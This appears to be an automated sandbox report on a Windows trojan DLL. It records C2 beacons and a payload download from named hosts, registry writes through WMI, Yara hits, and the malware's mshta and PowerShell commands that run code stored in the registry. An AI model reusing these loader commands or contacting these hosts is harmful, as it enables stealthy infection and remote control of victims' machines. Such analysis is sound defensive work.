Source: global traffic |
HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S |
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn |
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp |
String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i |
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll |
String found in binary or memory: https://toldsend.com4 |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll' |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put |
|
Source: unknown |
Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
Jump to behavior |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
